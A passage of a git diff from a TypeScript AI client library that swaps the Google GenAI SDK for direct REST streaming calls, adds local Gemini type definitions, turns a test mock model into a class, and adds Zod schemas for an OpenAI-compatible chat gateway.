"../utils/schema"; +import { finalizeErrorMessage, type RawHttpRequestDump, withHttpStatus } from "../utils/http-inspector"; +import { normalizeSchemaForCCA, normalizeSchemaForGoogle, toolWireSchema } from "../utils/schema"; +import type { + Content, + FinishReason, + FunctionCallingConfigMode, + GenerateContentConfig, + GenerateContentParameters, + GenerateContentResponse, + Part, + ThinkingConfig, + ThinkingLevel, +} from "./google-types"; import { transformMessages } from "./transform-messages"; import { NON_VISION_IMAGE_PLACEHOLDER } from "./vision-guard"; -export { sanitizeSchemaForGoogle }; +export type { + Content, + FunctionCallingConfigMode, + GenerateContentParameters, + GenerateContentResponse, + ThinkingConfig, +} from "./google-types"; +export { normalizeSchemaForGoogle }; type GoogleApiType = "google-generative-ai" | "google-gemini-cli" | "google-vertex"; @@ -340,7 +349,7 @@ export function convertTools( name: tool.name, description: tool.description || "", ...(useParameters - ? { parameters: prepareSchemaForCCA(toolWireSchema(tool)) } + ? { parameters: normalizeSchemaForCCA(toolWireSchema(tool)) } : { parametersJsonSchema: toolWireSchema(tool) }), })), }, @@ -353,13 +362,13 @@ export function convertTools( export function mapToolChoice(choice: string): FunctionCallingConfigMode { switch (choice) { case "auto": - return FunctionCallingConfigMode.AUTO; + return "AUTO"; case "none": - return FunctionCallingConfigMode.NONE; + return "NONE"; case "any": - return FunctionCallingConfigMode.ANY; + return "ANY"; default: - return FunctionCallingConfigMode.AUTO; + return "AUTO"; } } @@ -368,25 +377,25 @@ export function mapToolChoice(choice: string): FunctionCallingConfigMode { */ export function mapStopReason(reason: FinishReason): StopReason { switch (reason) { - case FinishReason.STOP: + case "STOP": return "stop"; - case FinishReason.MAX_TOKENS: + case "MAX_TOKENS": return "length"; - case FinishReason.BLOCKLIST: - case FinishReason.PROHIBITED_CONTENT: - case FinishReason.SPII: - case FinishReason.SAFETY: - case FinishReason.IMAGE_SAFETY: - case FinishReason.IMAGE_PROHIBITED_CONTENT: - case FinishReason.IMAGE_RECITATION: - case FinishReason.IMAGE_OTHER: - case FinishReason.RECITATION: - case FinishReason.FINISH_REASON_UNSPECIFIED: - case FinishReason.OTHER: - case FinishReason.LANGUAGE: - case FinishReason.MALFORMED_FUNCTION_CALL: - case FinishReason.UNEXPECTED_TOOL_CALL: - case FinishReason.NO_IMAGE: + case "BLOCKLIST": + case "PROHIBITED_CONTENT": + case "SPII": + case "SAFETY": + case "IMAGE_SAFETY": + case "IMAGE_PROHIBITED_CONTENT": + case "IMAGE_RECITATION": + case "IMAGE_OTHER": + case "RECITATION": + case "FINISH_REASON_UNSPECIFIED": + case "OTHER": + case "LANGUAGE": + case "MALFORMED_FUNCTION_CALL": + case "UNEXPECTED_TOOL_CALL": + case "NO_IMAGE": return "error"; default: { throw new Error(`Unhandled stop reason: ${reason satisfies never}`); @@ -723,12 +732,19 @@ export function buildGoogleGenerateContentParams<T extends "google-generative-ai * Caller-supplied `prepare()` runs inside the try-block so any failure (missing project, * bad auth, etc.) is funneled through the same error path as a streaming failure. */ +export interface GoogleGenAIRequestPlan { + params: GenerateContentParameters; + url: string; + headers: Record<string, string>; + fetch?: FetchImpl; +} + export function streamGoogleGenAI<T extends "google-generative-ai" | "google-vertex">(args: { model: Model<T>; options: GoogleSharedStreamOptions | undefined; api: T; retainTextSignature?: boolean; - prepare: () => { client: GoogleGenAI; params: GenerateContentParameters; url: string | undefined }; + prepare: () => GoogleGenAIRequestPlan | Promise<GoogleGenAIRequestPlan>; }): AssistantMessageEventStream { const { model, options, api, retainTextSignature, prepare } = args; const stream = new AssistantMessageEventStream(); @@ -757,17 +773,44 @@ export function streamGoogleGenAI<T extends "google-generative-ai" | "google-ver let rawRequestDump: RawHttpRequestDump | undefined; try { - const { client, params, url } = prepare(); - options?.onPayload?.(params); + const plan = await prepare(); + let params = plan.params; + const replacement = await options?.onPayload?.(params, model); + if (replacement !== undefined) { + params = replacement as GenerateContentParameters; + } rawRequestDump = { provider: model.provider, api: output.api, model: model.id, method: "POST", - url, + url: plan.url, body: params, + headers: plan.headers, }; - const googleStream = await client.models.generateContentStream(params); + + const wireBody = paramsToWireBody(params); + const fetchImpl = plan.fetch ?? options?.fetch ?? (globalThis.fetch.bind(globalThis) as FetchImpl); + const response = await fetchImpl(plan.url, { + method: "POST", + headers: { ...plan.headers, "Content-Type": "application/json", Accept: "text/event-stream" }, + body: JSON.stringify(wireBody), + signal: options?.signal, + }); + if (!response.ok) { + const errorText = await response.text().catch(() => ""); + throw withHttpStatus( + new Error(`Google API error (${response.status}): ${extractGoogleErrorMessage(errorText)}`), + response.status, + ); + } + if (!response.body) { + throw new Error("Google API returned an empty response body"); + } + + const googleStream = readSseJson<GenerateContentResponse>(response.body, options?.signal, event => + options?.onSseEvent?.({ event: event.event, data: event.data, raw: [...event.raw] }, model), + ); stream.push({ type: "start", partial: output }); await consumeGoogleStream({ @@ -803,3 +846,56 @@ export function streamGoogleGenAI<T extends "google-generative-ai" | "google-ver return stream; } + +/** + * Lift the SDK's `params.config` fields out of `config` and place them where the + * Gemini / Vertex AI REST API expects them on the request body. Mirrors the + * generateContentParametersTo{Mldev,Vertex} transformation in @google/genai + * for the subset of fields this codebase actually sets. + * + * `abortSignal` is intentionally dropped — the SDK propagates it via `fetch.signal`, + * which our caller already wires up through `options.signal`. + */ +function paramsToWireBody(params: GenerateContentParameters): Record<string, unknown> { + const body: Record<string, unknown> = { contents: params.contents }; + const config = params.config; + if (!config) return body; + + if (config.systemInstruction !== undefined) body.systemInstruction = config.systemInstruction; + if (config.tools !== undefined) body.tools = config.tools; + if (config.toolConfig !== undefined) body.toolConfig = config.toolConfig; + if (config.safetySettings !== undefined) body.safetySettings = config.safetySettings; + if (config.cachedContent !== undefined) body.cachedContent = config.cachedContent; + + const gen: Record<string, unknown> = {}; + if (config.temperature !== undefined) gen.temperature = config.temperature; + if (config.maxOutputTokens !== undefined) gen.maxOutputTokens = config.maxOutputTokens; + if (config.topP !== undefined) gen.topP = config.topP; + if (config.topK !== undefined) gen.topK = config.topK; + if (config.candidateCount !== undefined) gen.candidateCount = config.candidateCount; + if (config.stopSequences !== undefined) gen.stopSequences = config.stopSequences; + if (config.presencePenalty !== undefined) gen.presencePenalty = config.presencePenalty; + if (config.frequencyPenalty !== undefined) gen.frequencyPenalty = config.frequencyPenalty; + if (config.seed !== undefined) gen.seed = config.seed; + if (config.responseMimeType !== undefined) gen.responseMimeType = config.responseMimeType; + if (config.responseSchema !== undefined) gen.responseSchema = config.responseSchema; + if (config.responseJsonSchema !== undefined) gen.responseJsonSchema = config.responseJsonSchema; + if (config.responseModalities !== undefined) gen.responseModalities = config.responseModalities; + if (config.thinkingConfig !== undefined) gen.thinkingConfig = config.thinkingConfig; + const generationConfig = config as unknown as { minP?: number; repetitionPenalty?: number }; + if (generationConfig.minP !== undefined) gen.minP = generationConfig.minP; + if (generationConfig.repetitionPenalty !== undefined) gen.repetitionPenalty = generationConfig.repetitionPenalty; + if (Object.keys(gen).length > 0) body.generationConfig = gen; + return body; +} + +function extractGoogleErrorMessage(errorText: string): string { + if (!errorText) return "Unknown error"; + try { + const parsed = JSON.parse(errorText) as { error?: { message?: string } }; + if (parsed.error?.message) return parsed.error.message; + } catch { + // fall through to raw text + } + return errorText; +} diff --git a/packages/ai/src/providers/google-types.ts b/packages/ai/src/providers/google-types.ts new file mode 100644 index 000000000..58b330275 --- /dev/null +++ b/packages/ai/src/providers/google-types.ts @@ -0,0 +1,167 @@ +/** + * Local mirror of the subset of `@google/genai` types this package consumes. + * + * Field shapes match Gemini / Vertex AI wire format 1:1. Enum-shaped values are + * modelled as string literal unions so they pass through `JSON.stringify` and + * `JSON.parse` unchanged. + * + * Keep this file in sync with the actual request/response surface of: + * - `POST {generativelanguage,aiplatform}.googleapis.com/.../models/{model}:streamGenerateContent?alt=sse` + * - The Cloud Code Assist endpoint used by `google-gemini-cli.ts` + */ + +/** Mirror of `@google/genai`'s `FinishReason` string enum. */ +export type FinishReason = + | "FINISH_REASON_UNSPECIFIED" + | "STOP" + | "MAX_TOKENS" + | "SAFETY" + | "RECITATION" + | "LANGUAGE" + | "OTHER" + | "BLOCKLIST" + | "PROHIBITED_CONTENT" + | "SPII" + | "MALFORMED_FUNCTION_CALL" + | "IMAGE_SAFETY" + | "IMAGE_PROHIBITED_CONTENT" + | "IMAGE_RECITATION" + | "IMAGE_OTHER" + | "UNEXPECTED_TOOL_CALL" + | "NO_IMAGE"; + +/** Mirror of `@google/genai`'s `FunctionCallingConfigMode` string enum. */ +export type FunctionCallingConfigMode = "MODE_UNSPECIFIED" | "AUTO" | "NONE" | "ANY" | "VALIDATED"; + +/** Mirror of `@google/genai`'s `ThinkingLevel` string enum. */ +export type ThinkingLevel = "THINKING_LEVEL_UNSPECIFIED" | "MINIMAL" | "LOW" | "MEDIUM" | "HIGH"; + +/** Inline base64-encoded data part. */ +export interface InlineDataPart { + mimeType: string; + data: string; +} + +/** Function call emitted by the model. */ +export interface FunctionCallPart { + name?: string; + args?: Record<string, unknown>; + id?: string; +} + +/** Tool execution result fed back to the model. */ +export interface FunctionResponsePart { + name: string; + response: Record<string, unknown>; + parts?: Part[]; + id?: string; +} + +/** + * A single piece of a `Content` message. Mirrors the SDK's union by keeping + * every optional field — the model and the wire treat shape as discriminator. + */ +export interface Part { + text?: string; + thought?: boolean; + thoughtSignature?: string; + inlineData?: InlineDataPart; + functionCall?: FunctionCallPart; + functionResponse?: FunctionResponsePart; +} + +/** Conversation turn. Roles: `"user"`, `"model"`, optionally absent for system instructions. */ +export interface Content { + role?: string; + parts?: Part[]; +} + +/** Thinking/reasoning configuration shared by Gemini 2.x and 3.x models. */ +export interface ThinkingConfig { + includeThoughts?: boolean; + thinkingBudget?: number; + thinkingLevel?: ThinkingLevel; +} + +/** Function declaration entry inside `tools[].functionDeclarations`. */ +export interface FunctionDeclaration { + name: string; + description?: string; + parameters?: Record<string, unknown>; + parametersJsonSchema?: Record<string, unknown>; +} + +/** Tool group as accepted at the request top level. */ +export interface ToolDeclaration { + functionDeclarations: Record<string, unknown>[]; +} + +/** Tool selection mode container. */ +export interface ToolConfig { + functionCallingConfig?: { + mode: FunctionCallingConfigMode; + allowedFunctionNames?: string[]; + }; +} + +/** + * Generation/sampling and request-shape options passed via the SDK's `config`. + * + * Fields that the wire format places at the request body root (systemInstruction, + * tools, toolConfig, safetySettings, cachedContent) live here too — the + * transformer in `google-shared.ts` lifts them out when serializing. + */ +export interface GenerateContentConfig { + temperature?: number; + maxOutputTokens?: number; + topP?: number; + topK?: number; + candidateCount?: number; + stopSequences?: string[]; + presencePenalty?: number; + frequencyPenalty?: number; + seed?: number; + responseMimeType?: string; + responseSchema?: Record<string, unknown>; + responseJsonSchema?: Record<string, unknown>; + responseModalities?: string[]; + systemInstruction?: Content | { role?: string; parts: { text: string }[] }; + tools?: ToolDeclaration[]; + toolConfig?: ToolConfig; + safetySettings?: Array<Record<string, unknown>>; + cachedContent?: string; + thinkingConfig?: ThinkingConfig; + abortSignal?: AbortSignal; +} + +/** Top-level argument to `generateContentStream`. */ +export interface GenerateContentParameters { + model: string; + contents: Content[]; + config?: GenerateContentConfig; +} + +/** Per-stream candidate envelope. */ +export interface Candidate { + content?: Content; + finishReason?: FinishReason; + index?: number; +} + +/** Cumulative token accounting attached to the trailing chunk. */ +export interface UsageMetadata { + promptTokenCount?: number; + candidatesTokenCount?: number; + thoughtsTokenCount?: number; + totalTokenCount?: number; + cachedContentTokenCount?: number; +} + +/** Single SSE chunk's parsed JSON body. */ +export interface GenerateContentResponse { + candidates?: Candidate[]; + usageMetadata?: UsageMetadata; + modelVersion?: string; + responseId?: string; + promptFeedback?: Record<string, unknown>; +} diff --git a/packages/ai/src/providers/google-vertex.ts b/packages/ai/src/providers/google-vertex.ts index ad8a21340..31ad3a676 100644 --- a/packages/ai/src/providers/google-vertex.ts +++ b/packages/ai/src/providers/google-vertex.ts @@ -1,8 +1,13 @@ -import { GoogleGenAI } from "@google/genai"; import { $env } from "@oh-my-pi/pi-utils"; -import type { Context, FetchImpl, Model, StreamFunction } from "../types"; +import type { Context, Model, StreamFunction } from "../types"; import type { AssistantMessageEventStream } from "../utils/event-stream"; -import { buildGoogleGenerateContentParams, type GoogleSharedStreamOptions, streamGoogleGenAI } from "./google-shared"; +import { getVertexAccessToken } from "./google-auth"; +import { + buildGoogleGenerateContentParams, + type GoogleGenAIRequestPlan, + type GoogleSharedStreamOptions, + streamGoogleGenAI, +} from "./google-shared"; export interface GoogleVertexOptions extends GoogleSharedStreamOptions { project?: string; @@ -21,63 +26,37 @@ export const streamGoogleVertex: StreamFunction<"google-vertex"> = ( options, api: "google-vertex", retainTextSignature: true, - prepare: () => { + prepare: async (): Promise<GoogleGenAIRequestPlan> => { const apiKey = resolveApiKey(options); - const project = apiKey ? undefined : resolveProject(options); - const location = apiKey ? undefined : resolveLocation(options); - const client = apiKey - ? createClientWithApiKey(model, apiKey, options?.fetch) - : createClient(model, project!, location!, options?.fetch); const params = buildGoogleGenerateContentParams(model, context, options ?? {}); - const url = apiKey - ? `https://aiplatform.googleapis.com/${API_VERSION}/publishers/google/models/${model.id}:streamGenerateContent` - : `https://${location}-aiplatform.googleapis.com/${API_VERSION}/projects/${project}/locations/${location}/publishers/google/models/${model.id}:streamGenerateContent`; - return { client, params, url }; + const baseHeaders: Record<string, string> = { + ...(model.headers ?? {}), + ...(options?.headers ?? {}), + }; + + if (apiKey) { + const url = `https://aiplatform.googleapis.com/${API_VERSION}/publishers/google/models/${model.id}:streamGenerateContent?alt=sse`; + return { + params, + url, + headers: { ...baseHeaders, "x-goog-api-key": apiKey }, + fetch: options?.fetch, + }; + } + + const project = resolveProject(options); + const location = resolveLocation(options); + const accessToken = await getVertexAccessToken({ signal: options?.signal, fetch: options?.fetch }); + const url = `https://${location}-aiplatform.googleapis.com/${API_VERSION}/projects/${project}/locations/${location}/publishers/google/models/${model.id}:streamGenerateContent?alt=sse`; + return { + params, + url, + headers: { ...baseHeaders, Authorization: `Bearer ${accessToken}` }, + fetch: options?.fetch, + }; }, }); -function buildHttpOptions( - model: Model<"google-vertex">, - fetchOverride: FetchImpl | undefined, -): { headers?: Record<string, string>; fetch?: FetchImpl } | undefined { - const options: { headers?: Record<string, string>; fetch?: FetchImpl } = {}; - if (model.headers) { - options.headers = { ...model.headers }; - } - if (fetchOverride) { - options.fetch = fetchOverride; - } - return Object.keys(options).length > 0 ? options : undefined; -} - -function createClient( - model: Model<"google-vertex">, - project: string, - location: string, - fetchOverride: FetchImpl | undefined, -): GoogleGenAI { - return new GoogleGenAI({ - vertexai: true, - project, - location, - apiVersion: API_VERSION, - httpOptions: buildHttpOptions(model, fetchOverride), - }); -} - -function createClientWithApiKey( - model: Model<"google-vertex">, - apiKey: string, - fetchOverride: FetchImpl | undefined, -): GoogleGenAI { - return new GoogleGenAI({ - vertexai: true, - apiKey, - apiVersion: API_VERSION, - httpOptions: buildHttpOptions(model, fetchOverride), - }); -} - function resolveApiKey(options?: GoogleVertexOptions): string | undefined { // options.apiKey may contain sentinel values like "<authenticated>" or "N/A" // leaked from the agent loop — only use it if it looks like a real API key. diff --git a/packages/ai/src/providers/google.ts b/packages/ai/src/providers/google.ts index b94386b8b..2d64c4199 100644 --- a/packages/ai/src/providers/google.ts +++ b/packages/ai/src/providers/google.ts @@ -1,11 +1,17 @@ -import { GoogleGenAI } from "@google/genai"; import { getEnvApiKey } from "../stream"; -import type { Context, FetchImpl, Model, StreamFunction } from "../types"; +import type { Context, Model, StreamFunction } from "../types"; import type { AssistantMessageEventStream } from "../utils/event-stream"; -import { buildGoogleGenerateContentParams, type GoogleSharedStreamOptions, streamGoogleGenAI } from "./google-shared"; +import { + buildGoogleGenerateContentParams, + type GoogleGenAIRequestPlan, + type GoogleSharedStreamOptions, + streamGoogleGenAI, +} from "./google-shared"; export type GoogleOptions = GoogleSharedStreamOptions; +const DEFAULT_GENERATIVE_LANGUAGE_BASE = "https://generativelanguage.googleapis.com/v1beta"; + export const streamGoogle: StreamFunction<"google-generative-ai"> = ( model: Model<"google-generative-ai">, context: Context, @@ -15,35 +21,21 @@ export const streamGoogle: StreamFunction<"google-generative-ai"> = ( model, options, api: "google-generative-ai", - prepare: () => { + prepare: (): GoogleGenAIRequestPlan => { const apiKey = options?.apiKey || getEnvApiKey(model.provider); - const client = createClient(model, apiKey, options?.fetch); + if (!apiKey) { + throw new Error("Google Generative AI requires an API key (GEMINI_API_KEY or options.apiKey)."); + } const params = buildGoogleGenerateContentParams(model, context, options ?? {}); - const url = model.baseUrl ? `${model.baseUrl}/models/${model.id}:streamGenerateContent` : undefined; - return { client, params, url }; + // `model.baseUrl` already includes the API version segment when set (mirrors the + // `apiVersion: ""` reset that the SDK relied on for custom base URLs). + const base = model.baseUrl?.trim() || DEFAULT_GENERATIVE_LANGUAGE_BASE; + const url = `${base}/models/${model.id}:streamGenerateContent?alt=sse`; + const headers: Record<string, string> = { + "x-goog-api-key": apiKey, + ...(model.headers ?? {}), + ...(options?.headers ?? {}), + }; + return { params, url, headers, fetch: options?.fetch }; }, }); - -function createClient(model: Model<"google-generative-ai">, apiKey?: string, fetchOverride?: FetchImpl): GoogleGenAI { - const httpOptions: { - baseUrl?: string; - apiVersion?: string; - headers?: Record<string, string>; - fetch?: FetchImpl; - } = {}; - if (model.baseUrl) { - httpOptions.baseUrl = model.baseUrl; - httpOptions.apiVersion = ""; // baseUrl already includes version path, don't append - } - if (model.headers) { - httpOptions.headers = model.headers; - } - if (fetchOverride) { - httpOptions.fetch = fetchOverride; - } - - return new GoogleGenAI({ - apiKey, - httpOptions: Object.keys(httpOptions).length > 0 ? httpOptions : undefined, - }); -} diff --git a/packages/ai/src/providers/mock.ts b/packages/ai/src/providers/mock.ts index 7c2228526..1fffb1356 100644 --- a/packages/ai/src/providers/mock.ts +++ b/packages/ai/src/providers/mock.ts @@ -145,35 +145,6 @@ export interface MockModelOptions { reasoning?: boolean; } -/** Returned by `createMockModel`. */ -export interface MockModelHandle { - /** The `Model<"mock">` object to pass to `stream()` or agent config. */ - readonly model: Model<MockApi>; - /** Recorded calls in invocation order. */ - readonly calls: ReadonlyArray<MockCall>; - /** A streamFn-compatible callable. Forward to `agentLoop` or pi `stream()`. */ - readonly stream: (model: Model<Api>, context: Context, options?: SimpleStreamOptions) => AssistantMessageEventStream; - /** - * Append a handler to the internal queue consumed AFTER the constructor - * `responses` source is exhausted (but before the fallback). Use this for - * interactive tests that decide responses after the model is created. - */ - push(response: MockHandler): void; - /** Reset recorded calls AND the extras queue. The constructor `responses` are NOT reset. */ - reset(): void; -} - -interface MockState { - iterator?: Iterator<MockHandler> | AsyncIterator<MockHandler>; - exhausted: boolean; - readonly extras: MockHandler[]; - fallback?: MockHandler; - readonly calls: MockCall[]; - toolCallCounter: number; -} - -const STATE_BY_MODEL = new WeakMap<Model<Api>, MockState>(); - const ZERO_COST: Model["cost"] = { input: 0, output: 0, @@ -181,49 +152,82 @@ const ZERO_COST: Model["cost"] = { cacheWrite: 0, }; -/** Check whether `model` was produced by `createMockModel`. */ -export function isMockModel(model: Model<Api>): model is Model<MockApi> { - return STATE_BY_MODEL.has(model); +/** + * A `Model<"mock">` that carries its own scripted state. Pass instances to + * `stream()` or agent configs, and use the same instance to inspect calls + * and feed additional handlers. + */ +export class MockModel implements Model<MockApi> { + readonly id: string; + readonly name: string; + readonly api: MockApi = MOCK_API; + readonly provider: string; + readonly baseUrl = "mock://"; + readonly reasoning: boolean; + readonly input: ("text" | "image")[] = ["text"]; + readonly cost: Model["cost"]; + readonly contextWindow: number; + readonly maxTokens: number; + + /** Recorded calls in invocation order. */ + readonly calls: MockCall[] = []; + + iterator?: Iterator<MockHandler> | AsyncIterator<MockHandler>; + exhausted: boolean; + readonly extras: MockHandler[] = []; + fallback?: MockHandler; + toolCallCounter = 0; + + constructor(options: MockModelOptions = {}) { + this.id = options.id ?? "mock-model"; + this.name = options.id ?? "mock-model"; + this.provider = options.provider ?? "mock"; + this.reasoning = options.reasoning ?? false; + this.cost = options.cost ?? ZERO_COST; + this.contextWindow = options.contextWindow ?? 200_000; + this.maxTokens = options.maxTokens ?? 32_768; + this.iterator = options.responses === undefined ? undefined : iteratorOf(options.responses); + this.exhausted = options.responses === undefined; + this.fallback = options.handler; + } + + /** Back-compat alias: the model is its own handle. */ + get model(): this { + return this; + } + + /** A streamFn-compatible callable. Forward to `agentLoop` or pi `stream()`. */ + stream = (_model: Model<Api>, context: Context, options?: SimpleStreamOptions): AssistantMessageEventStream => + streamMock(this, context, options); + + /** + * Append a handler to the internal queue consumed AFTER the constructor + * `responses` source is exhausted (but before the fallback). Use this for + * interactive tests that decide responses after the model is created. + */ + push(response: MockHandler): void { + this.extras.push(response); + } + + /** Reset recorded calls AND the extras queue. The constructor `responses` are NOT reset. */ + reset(): void { + this.extras.length = 0; + this.calls.length = 0; + this.toolCallCounter = 0; + } } -/** Construct a mock model + handle. */ -export function createMockModel(options: MockModelOptions = {}): MockModelHandle { - const model: Model<MockApi> = { - id: options.id ?? "mock-model", - name: options.id ?? "mock-model", - api: MOCK_API, - provider: options.provider ?? "mock", - baseUrl: "mock://", - reasoning: options.reasoning ?? false, - input: ["text"], - cost: options.cost ?? ZERO_COST, - contextWindow: options.contextWindow ?? 200_000, - maxTokens: options.maxTokens ?? 32_768, - }; +/** @deprecated Use {@link MockModel}; the class IS the handle. */ +export type MockModelHandle = MockModel; - const state: MockState = { - iterator: options.responses === undefined ? undefined : iteratorOf(options.responses), - exhausted: options.responses === undefined, - extras: [], - fallback: options.handler, - calls: [], - toolCallCounter: 0, - }; - STATE_BY_MODEL.set(model, state); +/** Check whether `model` was produced by `createMockModel`. */ +export function isMockModel(model: Model<Api>): model is MockModel { + return model instanceof MockModel; +} - return { - model, - calls: state.calls, - stream: (_model, context, opts) => streamMock(model, context, opts), - push(response) { - state.extras.push(response); - }, - reset() { - state.extras.length = 0; - state.calls.length = 0; - state.toolCallCounter = 0; - }, - }; +/** Construct a mock model. */ +export function createMockModel(options: MockModelOptions = {}): MockModel { + return new MockModel(options); } /** Stream function for `Model<"mock">`. Matches the pi-ai per-provider stream signature. */ @@ -233,21 +237,19 @@ export function streamMock( options?: SimpleStreamOptions, ): AssistantMessageEventStream { const stream = new AssistantMessageEventStream(); - const state = STATE_BY_MODEL.get(model); - if (!state) { + if (!isMockModel(model)) { queueMicrotask(() => { stream.fail( new Error( - "streamMock called with a model not produced by createMockModel(). " + - "Pass the `model` field of a MockModelHandle.", + "streamMock called with a model not produced by createMockModel(). " + "Pass a MockModel instance.", ), ); }); return stream; } - state.calls.push({ context, options }); - void runMock(stream, model, context, options, state); + model.calls.push({ context, options }); + void runMock(stream, model, context, options); return stream; } @@ -267,7 +269,7 @@ function iteratorOf(source: MockResponseSource): Iterator<MockHandler> | AsyncIt return (source as Iterable<MockHandler>)[Symbol.iterator](); } -async function pullHandler(state: MockState): Promise<MockHandler | undefined> { +async function pullHandler(state: MockModel): Promise<MockHandler | undefined> { if (state.iterator && !state.exhausted) { const result = await Promise.resolve(state.iterator.next()); if (!result.done) return result.value; @@ -279,16 +281,15 @@ async function pullHandler(state: MockState): Promise<MockHandler | undefined> { async function runMock( stream: AssistantMessageEventStream, - model: Model<Api>, + model: MockModel, context: Context, options: SimpleStreamOptions | undefined, - state: MockState, ): Promise<void> { const startedAt = Date.now(); let handler: MockHandler | undefined; try { - handler = await pullHandler(state); + handler = await pullHandler(model); } catch (err) { stream.fail(err); return; @@ -297,7 +298,7 @@ async function runMock( if (handler === undefined) { stream.fail( new Error( - `Mock model "${model.id}" received call ${state.calls.length} but no response or handler is configured.`, + `Mock model "${model.id}" received call ${model.calls.length} but no response or handler is configured.`, ), ); return; @@ -367,7 +368,7 @@ async function runMock( stream.push({ type: "start", partial }); for (const input of response.content ?? []) { - const block = normalizeContent(input, state); + const block = normalizeContent(input, model); blocks.push(block); const contentIndex = blocks.length - 1; @@ -405,7 +406,7 @@ async function runMock( stream.push({ type: "done", reason: reason as "stop" | "length" | "toolUse", message: partial }); } -function normalizeContent(input: MockContent, state: MockState): TextContent | ThinkingContent | ToolCall { +function normalizeContent(input: MockContent, state: MockModel): TextContent | ThinkingContent | ToolCall { if (typeof input === "string") { return { type: "text", text: input }; } @@ -493,7 +494,7 @@ function sleep(ms: number, signal?: AbortSignal): Promise<void> { return promise; } -function generateToolCallId(state: MockState): string { +function generateToolCallId(state: MockModel): string { state.toolCallCounter += 1; return `mock-tc-${state.toolCallCounter}`; } diff --git a/packages/ai/src/providers/openai-chat-server-schema.ts b/packages/ai/src/providers/openai-chat-server-schema.ts new file mode 100644 index 000000000..727c1f833 --- /dev/null +++ b/packages/ai/src/providers/openai-chat-server-schema.ts @@ -0,0 +1,243 @@ +/** + * Zod schemas for the OpenAI chat-completions request shape we accept on the + * gateway. Mirrors https://platform.openai.com/docs/api-reference/chat — only + * the shapes the gateway translation layer understands. Unknown fields on + * permissive objects are accepted-and-stripped (via `z.unknown()` passthroughs + * or `.loose()`) so the official OpenAI SDK — which sends a growing pile of + * non-strict defaults (e.g. `stream_options.include_obfuscation`) — does not + * trip 400s on shapes we simply ignore. + */ +import type { + ChatCompletionContentPart, + ChatCompletionCreateParams, + ChatCompletionMessageParam, + ChatCompletionMessageToolCall, + ChatCompletionTool, + ChatCompletionToolChoiceOption, +} from "openai/resources/chat/completions"; +import * as z from "zod/v4"; + +// ─── User-message content parts ───────────────────────────────────────────── + +export const textPartSchema = z.object({ + type: z.literal("text"), + text: z.string(), +}); + +/** + * OpenAI documents `image_url` as either `{ url: string, detail?: ... }` or — + * older clients — a bare string. Accept both shapes; downstream we extract a + * URL. `detail` is accepted for forward-compat but currently dropped (pi-ai's + * `ImageContent` has no detail field — TODO: plumb through if/when added). + */ +export const imagePartSchema = z.object({ + type: z.literal("image_url"), + image_url: z.union([ + z.string(), + z.object({ + url: z.string(), + detail: z.enum(["auto", "low", "high"]).optional(), + }), + ]), +}); + +/** OpenAI audio input block (gpt-4o-audio). Accepted; currently dropped downstream. */ +export const inputAudioPartSchema = z.object({ + type: z.literal("input_audio"), + input_audio: z.object({ + data: z.string(), + format: z.enum(["wav", "mp3"]), + }), +}); + +/** OpenAI file input block (file_search / vision-document). Accepted; currently dropped downstream. */ +export const filePartSchema = z.object({ + type: z.literal("file"), + file: z.object({ + file_id: z.string().optional(), + filename: z.string().optional(), + file_data: z.string().optional(), + }), +}); + +/** Replayed assistant refusal block. Accepted; currently dropped downstream. */ +export const refusalPartSchema = z.object({ + type: z.literal("refusal"), + refusal: z.string(), +}); + +/** + * Forward-compat catch-all for unknown content-part types. Matches every other + * `{ type: string, ... }` object so a new OpenAI block kind does not 400 the + * whole request; the walker ignores parts whose `type` it does not know. + */ +export const unknownPartSchema = z.object({ type: z.string() }).loose(); + +export const userContentPartSchema = z.union([ + textPartSchema, + imagePartSchema, + inputAudioPartSchema, + filePartSchema, + refusalPartSchema, + unknownPartSchema, +]); + +// ─── Tool calls / tools ───────────────────────────────────────────────────── + +export const toolCallSchema = z.object({ + id: z.string(), + type: z.literal("function").optional(), + function: z.object({ + name: z.string(), + arguments: z.string(), + }), +}); + +export const toolSchema = z.object({ + type: z.literal("function"), + function: z.object({ + name: z.string().min(1), + description: z.string().optional(), + parameters: z.record(z.string(), z.unknown()).optional(), + /** OpenAI structured-output strict mode. Accepted, not enforced upstream. */ + strict: z.boolean().optional(), + }), +}); + +// ─── Tool choice ──────────────────────────────────────────────────────────── + +export const toolChoiceSchema = z.union([ + z.literal("auto"), + z.literal("none"), + z.literal("required"), + z.object({ + type: z.literal("function"), + function: z.object({ name: z.string().min(1) }), + }), + // Anthropic-style `{ type: 'tool', name }` — translated to the OpenAI + // function shape in the walker. + z.object({ + type: z.literal("tool"), + name: z.string().min(1), + }), +]); + +// ─── Messages ─────────────────────────────────────────────────────────────── + +const baseContent = z.union([z.string(), z.array(userContentPartSchema)]); + +export const systemMessageSchema = z.object({ + role: z.literal("system"), + content: baseContent, +}); + +export const developerMessageSchema = z.object({ + role: z.literal("developer"), + content: baseContent, +}); + +export const userMessageSchema = z.object({ + role: z.literal("user"), + content: baseContent, +}); + +export const assistantMessageSchema = z.object({ + role: z.literal("assistant"), + content: baseContent.optional(), + tool_calls: z.array(toolCallSchema).optional(), +}); + +export const toolMessageSchema = z.object({ + role: z.literal("tool"), + content: baseContent.optional(), + tool_call_id: z.string().optional(), +}); + +/** + * Legacy `function` role (pre-tools API). Translated to a `tool` role + * canonical message in the walker so downstream providers see one shape. + */ +export const functionMessageSchema = z.object({ + role: z.literal("function"), + name: z.string(), + content: z.string().nullable(), +}); + +export const messageSchema = z.discriminatedUnion("role", [ + systemMessageSchema, + developerMessageSchema, + userMessageSchema, + assistantMessageSchema, + toolMessageSchema, + functionMessageSchema, +]); + +// ─── Stream options ───────────────────────────────────────────────────────── + +/** + * Permissive: the official OpenAI SDK sets `include_obfuscation: false` by + * default. We only consume `include_usage`, so unknown keys are silently + * stripped rather than 400'd. + */ +export const streamOptionsSchema = z.object({ + include_usage: z.boolean().optional(), +}); + +// ─── Stop sequences ───────────────────────────────────────────────────────── + +// OpenAI rejects > 4 stop strings; mirror that at the gateway. +export const stopSchema = z.union([z.string(), z.array(z.string()).max(4)]); + +// ─── Top-level request ────────────────────────────────────────────────────── + +export const openaiChatRequestSchema = z.object({ + model: z.string().min(1), + messages: z.array(messageSchema), + tools: z.array(toolSchema).optional(), + tool_choice: toolChoiceSchema.optional(), + max_tokens: z.number().optional(), + max_completion_tokens: z.number().optional(), + temperature: z.number().optional(), + top_p: z.number().optional(), + stop: stopSchema.optional(), + stream: z.boolean().optional(), + stream_options: streamOptionsSchema.optional(), + + // ── Typed first-class passthroughs (now consumed by the 